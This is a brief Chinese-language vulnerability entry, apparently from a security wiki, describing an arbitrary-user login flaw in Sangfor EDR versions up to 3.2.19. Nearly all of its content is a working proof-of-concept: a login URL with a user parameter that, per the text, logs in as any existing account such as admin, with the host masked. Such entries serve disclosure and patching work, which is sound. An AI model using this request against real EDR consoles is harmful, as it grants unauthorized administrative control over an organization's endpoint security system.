跳转至

深信服EDR任意用户登录漏洞

漏洞范围

EDR <=3.2.19

漏洞POC

user=任意用户名即可登录(用户名存在):

https://******/ui/login.php?user=admin